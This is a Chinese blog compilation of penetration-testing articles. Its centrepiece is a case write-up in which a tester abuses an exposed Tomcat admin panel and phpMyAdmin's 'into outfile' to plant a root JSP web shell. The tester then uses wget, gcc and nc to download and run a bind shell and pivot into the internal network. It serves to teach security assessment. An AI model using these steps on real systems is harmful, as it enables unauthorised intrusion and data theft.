Chinadu's Blog

一、渗透测试概念
　 渗透测试 (penetration test)并没有一个标准的定义，国外一些安全组织达成共识的通用说法是：渗透测试是通过模拟恶意黑客的攻击方法，来评估计算机网络系统安全的一种评估方法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析，这个分析是从一个攻击者可能存在的位置来进行的，并且从这个位置有条件主动利用安全漏洞。
渗透测试还具有的两个显著特点是：
　 渗透测试是一个渐进的并且逐步深入的过程。
　 渗透测试是选择不影响业务系统正常运行的攻击方法进行的测试。
　 渗透测试完全模拟黑客可能使用的攻击技术和漏洞发现技术，对目标系统的安全做深入的探测，发现系统最脆弱的环节，能直观的让管理员知道自己网络所面临的问题。所以渗透测试是安全评估的方法之一。
阅读全文...

转载自：Hilven

目录

一.         此次目标的渗透过程.

1.1        过程

1.2        中间的小插曲.

1.3     渗透完成.

二.         测试发现的系统问题及解决办法参考

2.1        访问控制.

2.2        安全管理与实践.

2.3        应用和系统安全.

渗透测试案例

目标系统及软件版本

Linux 2.6.18-8.el5PAE

Apache 2.0 Handler

Mysql 5.0X

Web程序为Joomla （php）修改过的删减版本

渗透目标主站Web管理权限 修改目标漏洞和系统弱点

本案例的测试流程

1首先通过对网站进行一个初步的架构分析，Whois查询，和查询同服务器下的挂靠的其他网站.查看网站是否有其他分流负载服务器

2.通过浏览网站的默认的phpinfo.php和结合Whois信息对网站进行一个信息收集.了解目标都有哪些伺服器为其提供服务.

3.通过现有的扫描器对目标的系统 软件版本 开放端口进行扫描

阅读全文...

一个良好的渗透测试是什么组成的？

虽然执行一个渗透测试有许多明显的优点——执行渗透测试的价值在于它的结果。这些结果必须是有价值的，而且对于客户来说必须是很容易理解的。有一个常见的误解是认为渗透测试只是使用一些时髦的自动化安全工具，并处理所生成的报告。但是，成功执行一个浸透测试并不仅仅是需要安全工具。虽然这些自动化安全测试工具在实践中扮演了重要的角色，但是它们也是有缺点的。事实上，这些工具一直无法真正模拟一个高深攻击者的行为。不管安全工具完成的报告有多么全面，其中总是有一些需要解释的问题。

让我们看看构成一个良好渗透测试的一些关键因素：

阅读全文...

渗透测试是一种最老的评估计算机系统安全性的方法。在70年代初期，国防部就曾使用这种方法发现了计算机系统的安全漏洞，并促使开发构建更安全系统的程序。渗透测试越来越多地被许多组织用来保证信息系统和服务的安全性，从而使安全性漏洞在暴露之前就被修复。由于恶意代码、黑客、不满员工所造成的网络入侵、数据偷窃和攻击的频率和严重程度会继续增加，所以网络安全漏洞和数据偷窃所造成的风险和代价是极大的。由于企业电子化的兴起及其对安全性的要求，公司网络的远程访问也在增加。事实上，即使网络实现管理的很好，并使用了最新的硬件和软件，也仍然可能受到错误配置或软件缺陷的影响。这可能最终会将敏感信息的访问权限泄漏给入侵者。使用渗透测试工具则能够显著地减少这种情况的发生。

虽然渗透测试的主要目标是发现组织中网络基础架构的安全漏洞；但它也可能有许多次要目标，包括测试组织的安全问题识别和响应能力，测试员工安全知识或测试安全性政策规范等。

阅读全文...

1你的内网入口机器属于什么性质？例如：24小时运转的应用服务器、测试机器、员工办公机器、VPN？
根据你的回帖，可以得知，你目前既然已经拥有了数台内网服务器权限，那么应该是通过其内网反弹后门转发端口进入内网，我估计是应用服务器。而初期可能是通 过员工办公机器或者对方映射到公网上面的应用服务器进入内网的。

2此内网数据存储服务器属于几级内网？这个问题你未具体描述，因为往往会遇到1级、2级、3级甚至更深的类城域网结构。
这里假设你遇到的只是最初级的1级内网，既：内网可互通

3你目前行为的目的是什么？你描述说你需要将数据拷贝出来，但你又回帖说搞定了他们几台服务器，那么我的问题就是，根据你最后一次的回帖，不太明白你目前 的状况。A你无聊？B你还有其他目的？C你还没有搞定那台或数台数据储存服务器？
你不回答清楚，无法帮你参考啊。各种情况下，有不同的解决方式。
这里就仅认为你已经搞定数据储存服务器、并且只是基于成就感继续KO他们的服务器吧。
阅读全文...

前一段时间接了一个渗透测试的任务，过程有点意思，所以简单写一下，以供参考。

我们检测的三台主机中两台为Linux系统，一台为AIX系统。还有一台是边界路由器。
目标网络的主机通过地址转换来提供对外访问，内部使用172.16.*.*地址段(这些信息是测试之后才得到的，开始并不知道)。在边界路由器后面还有一台Cisco PIX 525
（515？）对三台主机进行保护，只允许外部用户连接不同主机的部分端口，例如80, 25,110等等。

根据我们的检测，Cisco PIX防火墙的过滤规则设置还是比较严密的，基本上没有多余端口允许外部用户访问。

在对xx.xx.xx.2和xx.xx.xx.3进行了端口扫描之后，发现只有通过xx.xx.xx.3的WEB服务进行进行间接攻击。首先检查TCP/80端口的服务，我们发现新闻搜索的功能是在另外一个端口8070提供的。直接输入：http://yyy.yyy.yyy:8070/

之后，得到了一个系统管理登录页面，简单地测试了一下，输入test/test作为用户名/口令，似乎认证成功，但最后并不能进入下一个页面。我们发现这个端口正在运行
Tomcat 3.1，而这个版本存在一个安全漏洞，缺省/admin目录是可以访问的。在输入：http://yyy.yyy.yyy:8070/admin之后，我们果然看到了”Tomcat Administration Tools”的页面，通过点击”Context Admin”这个链接，我们可以对Tomcat的Context进行管理，例如查看、增加、删除Context。这个Context有点类似虚拟目录，于是我们可以增加一个context, 例如”/tt”,将它的文档根目录设置为”/”，这样当我们访问http://yyy.yyy.yyy:8070/tt时看到的就是系统根目录的列表了！进一步可以查看任意目录里面的任意文件。由于Tomcat是以root身份运行的，所以可以查看任意系统文件，例如/etc/passwd和/etc/shadow。根据口令文件进行密码破解后发现系统中的两个用户test和root都使用了非常简单的口令：123456。尽管外部用户无法直接访问telnet服务，这些口令还是应当被重设为更为强壮的字符串

利用这个漏洞我们基本上可以查看整个系统，但是由于无法写入数据，威胁似乎还不是很大。

于是我们将注意力转移到论坛和聊天室。这两个服务一个监听在8080，一个监听在8888端口。直接输入http://yyy.yyy.yyy:8080/, 我们看到了Tomcat4.1.10的欢迎页面，点击左边的管理链接:http://yyy.yyy.yyy:8080/admin ，我们得到了一个登录页面，虽然我们不知道口令，但是通过前面8070端口的漏洞，我们找到了Tomcat保存这些口令的文件，得到了管理用户名为admin,口令为空。于是我们就可以对整个Tomcat服务器进行管理了。

但这仍然不足以让我们在系统上运行命令。于是我们继续检查聊天室所在的8888端口。这个端口运行的是apache 1.3.26 +php 4.1.2。开始没有发现什么问题，突然想到前面发现的两个漏洞都与/admin有关，这个端口上会不会也有这个目录呢？在输入这个目录之后我们惊奇地发现，我们进入了一个phpMyadmin的管理界面。我们可以对整个数据库进行任意操作。由于数据库是MySQL，它支持从本地操作系统读入或者写入数据。因此我们在test库中建立了一个简单的表，然后添加一条记录，记录的内容就是一个php文件的内容，我们想写入一个php文件，然后利用php调用外部命令的方法来执行命令。我们利用
select tt into outfile /path/test.php from kk

(感谢小许提供技术支持)

这样的命令来将数据库中的内容写到一个php文件里，但由于mysql是以mysql用户身份运行的，无法写到apache的目录中。所以这次尝试失败了。

我们又想到了一个方法，利用8070端口的漏洞我们可以访问任意系统文件，而8070端口是由tomcat提供服务的，如果我们可以设法在系统中创建一个.jsp文件，就可以远程访问这个jsp文件，它将被tomcat处理并运行。如果这个.jsp文件中的内容是一段执行系统命令代码，就可以运行系统命令了。

于是我们又重新编写了一段可以执行系统命令的jsp代码，将其输入测试表中，再次利用into outfile方法将其内容写到/tmp/test.jsp文件中，然后访问下列链接：
http://yyy.yyy.yyy:8070/tt/tmp/test.jsp

(感谢watercloud提供技术支持)

我们发现我们指定的命令被执行了！而且是以root身份执行的。这意味着我们已经完全控制了整个系统。

当然，通过cgi执行命令还是不如有一个shell来得方便。当然最简单的方法就是开一个xterm连回到我们的Xwindows即可。但是我们是用的NAT，连不进来。听说工程部有个IP是可以外部访问的，就搬了笔记本过去准备用，结果在一切都准备好之后，发现对方居然关机了!@#^*#%#%#$%

第二天，我决定还是用老办法，开个shell算了。首先要找到一个可以外部访问的端口。但是防火墙并不允许外部访问所有的端口，经过一番测试，发现所有允许访问的端口都被占用着。仔细看了看进程，发现chatserver占了4个端口，每一个端口对应一个聊天室，而且目前也没有人在使用这些聊天室。所以我就先kill掉其中一个进程，这样就可以将在其对应的端口上绑定一个shell了。

通过jsp执行命令来下载／编译／运行我们的bindshell：
wget http://ourhost/bindshell.c
gcc -o bindshell bindshell.c
nohup ./bindshell

现在就可以连接我们的shell了：nc yyy.yyy.yyy 9100

现在我们已经在防火墙的后面了，因此可以直接访问内网了。通过扫描发现存在如下内部主机：

172.16.1.1 Cisco PIX
172.16.1.2 mail
172.16.1.3 web
172.16.1.4 oracle db

进一步测试还可以入侵其中的oracle服务器。至此，此次渗透测试基本结束。

渗透测试（Penetration Test）是完全模拟黑客可能使用的攻击技术和漏洞发现技术，对目标系统的安全做深入的探测，发现系统最脆弱的环节。渗透测试能够直观的让管理人员知道自己网络所面临的问题。 实际上渗透测试并没有严格的分类方式，即使在软件开发生命周期中，也包含了渗透测试的环节： 但根据实际应用，普遍认同的几种分类方法如下： 　　根据渗透方法分类 　　黑箱测试 　　黑箱测试又被称为所谓的“Zero-Knowledge Testing”，渗透者完全处于对系统一无所知的状态，通常这类型测试，最初的信息获取来自于DNS、Web、Email及各种公开对外的服务器。 　　白盒测试 　　白盒测试与黑箱测试恰恰相反，测试者可以通过正常渠道向被测单位取得各种资料，包括网络拓扑、员工资料甚至网站或其它程序的代码片断，也能够与单位的其它员工（销售、程序员、管理者……）进行面对面的沟通。这类测试的目的是模拟企业内部雇员的越权操作。 　　隐秘测试 　　隐秘测试是对被测单位而言的，通常情况下，接受渗透测试的单位网络管理部门会收到通知：在某些时段进行测试。因此能够监测网络中出现的变化。但隐秘测试则被测单位也仅有极少数人知晓测试的存在，因此能够有效地检验单位中的信息安全事件监控、响应、恢复做得是否到位。 　　根据渗透目标分类 　　主机操作系统渗透 　　对Windows、Solaris、AIX、Linux、SCO、SGI等操作系统本身进行渗透测试。 　　数据库系统渗透 　　对MS-SQL、Oracle、MySQL、Informix、Sybase、DB2等数据库应用系统进行渗透测试。 　　应用系统渗透 　　对渗透目标提供的各种应用，如ASP、CGI、JSP、PHP等组成的WWW应用进行渗透测试。 　　网络设备渗透 　　对各种防火墙、入侵检测系统、网络设备进行渗透测试。 　　从攻方视角看渗透 　　攻方既包括了潜在的黑客、入侵者，也可能是经过企业授权的安全专家。在很多黑客的视角中，世界上永远没有不可能渗透的目标，差别仅在时间和耐性上。 　　目前我们仅仅从授权渗透的角度来讨论渗透测试的攻击路径及可能采用的技术手段。 　　测试目标不同，涉及需要采用的技术也会有一定差异，因此下面简单说明在不同位置可能采用的技术。 　　内网测试 　　内网测试指的是渗透测试人员由内部网络发起测试，这类测试能够模拟企业内部违规操作者的行为。最主要的“优势”是绕过了防火墙的保护。内部主要可能采用的渗透方式：远程缓冲区溢出，口令猜测，以及B/S或C/S应用程序测试（如果涉及C/S程序测试，需要提前准备相关客户端软件供测试使用）。 　　外网测试 　　外网测试指的是渗透测试人员完全处于外部网络（例如拨号、ADSL或外部光纤），模拟对内部状态一无所知的外部攻击者的行为。包括对网络设备的远程攻击，口令管理安全性测试，防火墙规则试探、规避，Web及其它开放应用服务的安全性测试。 　　不同网段/Vlan之间的渗透 　　这种渗透方式是从某内/外部网段，尝试对另一网段/Vlan进行渗透。这类测试通常可能用到的技术包括：对网络设备的远程攻击；对防火墙的远程攻击或规则探测、规避尝试。 　　渗透测试的流程图如图2所示。 　　信息的收集和分析伴随着每一个渗透测试步骤，每一个步骤又有三个组成部分：操作、响应和结果分析。 　　端口扫描 　　通过对目标地址的TCP/UDP端口扫描，确定其所开放的服务的数量和类型，这是所有渗透测试的基础。通过端口扫描，可以基本确定一个系统的基本信息，结合安全工程师的经验可以确定其可能存在，以及被利用的安全弱点，为进行深层次的渗透提供依据。 　　远程溢出 　　这是当前出现的频率最高、威胁最严重，同时又是最容易实现的一种渗透方法，一个具有一般网络知识的入侵者就可以在很短的时间内利用现成的工具实现远程溢出攻击。 　　对于防火墙内的系统同样存在这样的风险，只要对跨接防火墙内外的一台主机攻击成功，那么通过这台主机对防火墙内的主机进行攻击就易如反掌。 　　口令猜测 　　口令猜测也是一种出现概率很高的风险，几乎不需要任何攻击工具，利用一个简单的暴力攻击程序和一个比较完善的字典，就可以猜测口令。 　　对一个系统账号的猜测通常包括两个方面：首先是对用户名的猜测，其次是对密码的猜测。 　　本地溢出 　　所谓本地溢出是指在拥有了一个普通用户的账号之后，通过一段特殊的指令代码获得管理员权限的方法。使用本地溢出的前提是首先要获得一个普通用户密码。也就是说由于导致本地溢出的一个关键条件是设置不当的密码策略。 　　多年的实践证明，在经过前期的口令猜测阶段获取的普通账号登录系统之后，对系统实施本地溢出攻击，就能获取不进行主动安全防御的系统的控制管理权限。 　　脚本及应用测试 　　eb脚本及应用测试专门针对Web及数据库服务器进行。根据最新的技术统计，脚本安全弱点为当前Web系统，尤其是存在动态内容的Web系统比较严重的安全弱点之一。利用脚本相关弱点轻则可以获取系统其他目录的访问权限，重则将有可能取得系统的控制权限。因此对于含有动态页面的Web、数据库等系统，Web脚本及应用测试将是必不可少的一个环节。在Web脚本及应用测试中，可能需要检查的部份包括： 　　◆检查应用系统架构,防止用户绕过系统直接修改数据库； 　　◆检查身份认证模块，用以防止非法用户绕过身份认证； 　　◆检查数据库接口模块，用以防止用户获取系统权限； 　　◆检查文件接口模块，防止用户获取系统文件； 　　◆检查其他安全威胁； 　　无线测试 　中国的无线网络还处于建设时期，但是由于无线网络的部署简易，在一些大城市的普及率已经很高了。北京和上海的商务区至少80%的地方都可以找到接入点。 　　通过对无线网络的测试，可以判断企业局域网安全性，已经成为越来越重要的渗透测试环节。 　　除了上述的测试手段外，还有一些可能会在渗透测试过程中使用的技术，包括：社交工程学、拒绝服务攻击，以及中间人攻击。 　　从守方视角看渗透 　　当具备渗透测试攻击经验的人们站到系统管理员的角度，要保障一个大网的安全时，我们会发现，需要关注的问题是完全不同的：从攻方的视角看，是“攻其一点，不及其余”，只要找到一点漏洞，就有可能撕开整条战线；但从守方的视角看，却发现往往“千里之堤，毁于蚁穴”。因此，需要有好的理论指引，从技术到管理都注重安全，才能使网络固若金汤。 　　渗透测试的必要性 　　渗透测试利用网络安全扫描器、专用安全测试工具和富有经验的安全工程师的人工经验对网络中的核心服务器及重要的网络设备，包括服务器、网络设备、防火墙等进行非破坏性质的模拟黑客攻击，目的是侵入系统并获取机密信息并将入侵的过程和细节产生报告给用户。 　　渗透测试和工具扫描可以很好的互相补充。工具扫描具有很好的效率和速度，但是存在一定的误报率和漏报率，并且不能发现高层次、复杂、并且相互关联的安全问题；渗透测试需要投入的人力资源较大、对测试者